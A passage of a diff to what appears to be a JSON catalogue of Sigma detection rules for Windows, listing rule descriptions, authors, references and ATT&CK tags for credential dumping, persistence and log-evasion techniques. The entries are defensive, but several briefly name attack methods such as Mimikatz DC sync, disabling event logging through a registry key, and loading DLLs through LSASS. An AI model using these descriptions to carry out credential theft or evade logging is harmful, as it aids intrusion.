"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_atsvc_task.yml" - ], - "tags": [ - "attack.lateral_movement", - 
"attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" - ] - }, - "uuid": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "value": "Remote Task Creation via ATSVC Named Pipe" - }, - { - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/06/07", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_camera_microphone_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/duzvik/status/1269671601852813320", - "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ] - }, - "uuid": "8cd538a4-62d5-4e83-810b-12d41e428d6e", - "value": "Processes Accessing the Microphone and Webcam" - }, - { - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "meta": { - "author": "Florian Roth, Wojciech Lesicki", - "creation_date": "2021/05/26", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_cobaltstrike_service_installs.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.sans.org/webcasts/119395", - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", - "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", 
- "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" - ] - }, - "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", - "value": "CobaltStrike Service Installations - Security" - }, - { - "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "meta": { - "author": "OTR (Open Threat Research)", - "creation_date": "2018/11/28", - "falsepositive": [ - "Domain Controllers acting as printer servers too? :)" - ], - "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", - "https://twitter.com/_dirkjan/status/1309214379003588608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", - "value": "DCERPC SMB Spoolss Named Pipe" - }, - { - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "creation_date": "2020/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009183000.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" - ] - }, - "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", - "value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security" - }, - { - "description": "Detects Mimikatz DC sync security events", - "meta": { - "author": "Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu", + "author": "Florian Roth, @0xrawsec", "creation_date": "2018/06/03", "falsepositive": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Unknown" ], - "filename": "win_security_dcsync.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "create_stream_hash_ads_executable.yml", + "level": "medium", + "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://twitter.com/gentilkiwi/status/1003236624925413376", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml" - ], - "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" - ] - }, - "uuid": "611eab06-a145-4dfa-a295-3ccc5c20f59a", - "value": "Mimikatz DC Sync" - }, - { - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "meta": { - "author": "@BarryShooshooga", - "creation_date": "2019/10/26", - "falsepositive": [ - "Intended inclusions by administrator" - ], - "filename": "win_security_defender_bypass.yml", - "level": "high", - 
"logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_defender_bypass.yml" + "https://twitter.com/0xrawsec/status/1002478725605273600?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.s0139", + "attack.t1564.004" ] }, - "uuid": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", - "value": "Windows Defender Exclusion Set" + "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", + "value": "Executable in ADS" }, { - "description": "Detects an installation of a device that is forbidden by the system policy", + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", "meta": { - "author": "frack113", - "creation_date": "2022/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_device_installation_blocked.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-6423", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_device_installation_blocked.yml" - ], - "tags": "No established tags" - }, - "uuid": "c9eb55c3-b468-40ab-9089-db2862e42137", - "value": "Device Installation Blocked" - }, - { - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "meta": { - "author": "Nasreddine 
Bencherchali", - "creation_date": "2022/08/03", + "author": "omkar72", + "creation_date": "2020/10/25", "falsepositive": [ "Unlikely" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml", - "level": "critical", - "logsource.category": "No established category", + "filename": "registry_event_office_test_regadd.yml", + "level": "medium", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml" + "https://attack.mitre.org/techniques/T1137/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" ], "tags": [ - "attack.privilege_escalation" + "attack.persistence", + "attack.t1137.002" ] }, - "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", - "value": "DiagTrackEoP Default Login Username" + "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "value": "Office Application Startup - Office Test" }, { - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "description": "Detects actions caused by the RedMimicry Winnti playbook", "meta": { - "author": "@neu5ron", - 
"creation_date": "2017/11/19", + "author": "Alexander Rausch", + "creation_date": "2020/06/24", "falsepositive": [ "Unknown" ], - "filename": "win_security_disable_event_logging.yml", + "filename": "registry_event_redmimicry_winnti_reg.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "69aeb277-f15f-4d2d-b32a-55e883609563", - "value": "Disabling Windows Event Auditing" - }, - { - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.004" - ] - }, - "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "value": "DPAPI Domain Backup Key Extraction" - }, - { - "description": "Detects anyone attempting a backup for the DPAPI Master Key. 
This events gets generated at the source and not the Domain Controller.", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/10", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.004" - ] - }, - "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", - "value": "DPAPI Domain Master Key Backup Attempt" - }, - { - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/06/05", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_etw_modification.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1268712093928378368", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", - "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", - 
"https://bunnyinside.com/?term=f71e8cb9c76a", - "http://managed670.rssing.com/chan-5590147/all_p1.html", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_etw_modification.yml" + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" ], "tags": [ "attack.defense_evasion", "attack.t1112" ] }, - "uuid": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", - "value": "COMPlus_ETWEnabled Registry Modification" + "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "value": "RedMimicry Winnti Playbook Registry Manipulation" }, { - "description": "Checks for event id 1102 which indicates the security event log was cleared.", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", "meta": { - "author": "Saw Winn Naung", - "creation_date": "2021/08/15", + "author": "Den Iuzvyk", + "creation_date": "2020/06/07", "falsepositive": [ - "Legitimate administrative activity" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], - "filename": "win_security_event_log_cleared.yml", - "level": "medium", - "logsource.category": "No established category", + "filename": "registry_event_susp_mic_cam_access.yml", + "level": "high", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_event_log_cleared.yml" + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" ], "tags": [ - "attack.t1070.001" + "attack.collection", + "attack.t1125", + "attack.t1123" ] }, - "uuid": "a122ac13-daf8-4175-83a2-72c387be339d", - "value": "Security Event Log Cleared" + "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", + "value": "Suspicious Camera and Microphone Access" }, { - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", "meta": { - "author": "INIT_6", - "creation_date": "2021/07/02", + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/06/22", + "falsepositive": [ + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. 
https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" + ], + "filename": "registry_event_portproxy_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.dfirnotes.net/portproxy_detection/", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "value": "PortProxy Registry Key" + }, + { + "description": "Detects persistence registry keys for Recycle Bin", + "meta": { + "author": "frack113", + "creation_date": "2021/11/18", "falsepositive": [ "Unknown" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml", - "level": "critical", - "logsource.category": "No established category", + "filename": "registry_event_persistence_recycle_bin.yml", + "level": "high", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/INIT_3/status/1410662463641731075", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml" + "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", + "https://persistence-info.github.io/Data/recyclebin.html", + "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", + "value": "Registry Persistence Mechanisms in Recycle Bin" + }, + { + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_susp_lsass_dll_load.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + "https://twitter.com/SBousseaden/status/1183745981189427200", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" ], "tags": [ "attack.execution", - "attack.t1569", + "attack.persistence", + "attack.t1547.008" + ] + }, + "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "value": "DLL Load via LSASS" + }, + { + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "meta": { + "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate modification of screensaver" + ], + "filename": "registry_event_modify_screensaver_binary_path.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" + ], + "tags": [ + "attack.persistence", + 
"attack.privilege_escalation", + "attack.t1546.002" + ] + }, + "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "value": "Path To Screensaver Binary Modified" + }, + { + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "meta": { + "author": "Markus Neis, @markus_neis, Florian Roth", + "creation_date": "2021/07/04", + "falsepositive": [ + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + ], + "filename": "registry_event_mimikatz_printernightmare.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", + "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204", "cve.2021.1675", "cve.2021.34527" ] }, - "uuid": "8fe1c584-ee61-444b-be21-e9054b229694", - "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access" + "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "value": "PrinterNightmare Mimimkatz Driver Name" }, { - "description": "Detects external diskdrives or plugged in USB devices , EventID 6416 on windows 10 or later", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", "meta": { - "author": "Keith Wright", - "creation_date": "2019/11/20", + "author": "Florian Roth", + "creation_date": "2019/10/01", "falsepositive": [ - "Legitimate administrative activity" + "Software installers downloaded and used by users" ], - "filename": "win_security_external_device.yml", - "level": "low", - 
"logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" - ], - "tags": [ - "attack.t1091", - "attack.t1200", - "attack.lateral_movement", - "attack.initial_access" - ] - }, - "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", - "value": "External Disk Drive Or USB Storage Device" - }, - { - "description": "Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.", - "meta": { - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", - "creation_date": "2020/05/11", - "falsepositive": [ - "Exclude known DCs." - ], - "filename": "win_security_global_catalog_enumeration.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_global_catalog_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ] - }, - "uuid": "619b020f-0fd7-4f23-87db-3f51ef837a34", - "value": "Enumeration via the Global Catalog" - }, - { - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", - "falsepositive": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" - ], - "filename": "win_security_gpo_scheduledtasks.yml", + "filename": "registry_event_susp_download_run_key.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - 
"https://twitter.com/menasec1/status/1106899890377052160", - "https://www.secureworks.com/blog/ransomware-as-a-distraction", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_gpo_scheduledtasks.yml" + "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" ], "tags": [ "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.t1547.001" ] }, - "uuid": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "value": "Persistence and Execution at Scale via GPO Scheduled Task" + "uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "value": "Suspicious Run Key from Download" }, { - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", + "meta": { + "author": "Avneet Singh @v3t0_, oscd.community", + "creation_date": "2020/11/15", + "falsepositive": [ + "Legitimate modification of the registry key by legitimate program" + ], + "filename": "registry_event_runonce_persistence.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/990717080805789697", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", + "value": "Run Once Task Configuration in Registry" + }, + { + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby 
causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.009" + ] + }, + "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "value": "New DLL Added to AppCertDlls Registry Key" + }, + { + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1182516740955226112", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ] + }, + "uuid": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "value": "Disable Security Events Logging Adding Reg Key MiniNt" + }, + { + "description": "Sysmon registry detection of a local hidden user account.", "meta": { "author": "Christian Burkard", "creation_date": "2021/05/03", "falsepositive": [ 
"Unknown" ], - "filename": "win_security_hidden_user_creation.yml", + "filename": "registry_event_add_local_hidden_user.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1387743867663958021", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" + "https://twitter.com/SBousseaden/status/1387530414185664538", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, - "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", - "value": "Hidden Local User Creation" + "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "value": "Creation of a Local Hidden User Account by Registry" }, { - "description": "Rule to detect the Hybrid Connection Manager service installation.", + "description": "Detects the use of Windows Credential Editor (WCE)", "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2021/04/12", - "falsepositive": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." 
- ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1554" - ] - }, - "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "value": "HybridConnectionManager Service Installation" - }, - { - "description": "Detects execution of Impacket's psexec.py.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2020/12/14", + "author": "Florian Roth", + "creation_date": "2019/12/31", "falsepositive": [ "Unknown" ], - "filename": "win_security_impacket_psexec.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "registry_event_hack_wce_reg.yml", + "level": "critical", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "32d56ea1-417f-44ff-822b-882873f5f43b", - "value": "Impacket PsExec Execution" - }, - { - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "meta": { - "author": "Samir Bousseaden, wagga", - "creation_date": "2019/04/03", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_impacket_secretdump.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" + "https://www.ampliasecurity.com/research/windows-credentials-editor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" ], "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" - ] - }, - "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "value": "Possible Impacket SecretDump Remote Activity" - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", - "value": "Invoke-Obfuscation CLIP+ Launcher - Security" - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "meta": { - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "creation_date": "2019/11/08", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - 
